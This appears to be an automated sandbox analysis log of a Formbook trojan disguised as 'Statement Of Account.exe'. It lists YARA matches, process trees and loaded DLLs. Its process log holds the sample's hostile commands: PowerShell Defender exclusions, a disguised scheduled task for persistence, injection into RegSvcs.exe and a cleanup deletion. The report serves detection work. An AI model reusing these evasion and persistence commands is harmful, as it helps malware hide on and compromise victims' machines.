Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C1F92 14_2_014C1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C0E59 14_2_014C0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014D2E90 14_2_014D2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C9EB0 14_2_014C9EB0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00FEEA12 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00FC7EB0 appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00FC7E54 appears 116 times
Sample file is different than original file name gathered from version info
Source: Statement Of Account.exe, 00000000.00000002.1704225673.0000000004B83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000000.1668852535.0000000000C34000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIuBP.exeF vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000002.1712844282.0000000005B50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000002.1717785891.000000000A290000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000002.1700380760.000000000119E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Statement Of Account.exe
Source: Statement Of Account.exe Binary or memory string: OriginalFilenameIuBP.exeF vs Statement Of Account.exe
Uses 32bit PE files
Source: Statement Of Account.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses a Windows Living Off The Land Binaries (LOL bins)
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe" Jump to behavior
Yara signature match
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2954894231.000000000F91C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Statement Of Account.exe PID: 6744, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7572, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmstp.exe PID: 7592, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 7600, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Statement Of Account.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SdYCcXyq.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: _0020.SetAccessControl
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: _0020.AddAccessRule
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: _0020.SetAccessControl
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.evad.winEXE@227/15@4/3
Source: C:\Users\user\Desktop\Statement Of Account.exe File created: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
Source: C:\Users\user\Desktop\Statement Of Account.exe File created: C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp Jump to behavior
Source: Statement Of Account.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Statement Of Account.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Statement Of Account.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Statement Of Account.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\Statement Of Account.exe File read: C:\Users\user\Desktop\Statement Of Account.exe:Zone.Identifier Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\SdYCcXyq.exe C:\Users\user\AppData\Roaming\SdYCcXyq.exe
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: sppc.dll Jump to behavior
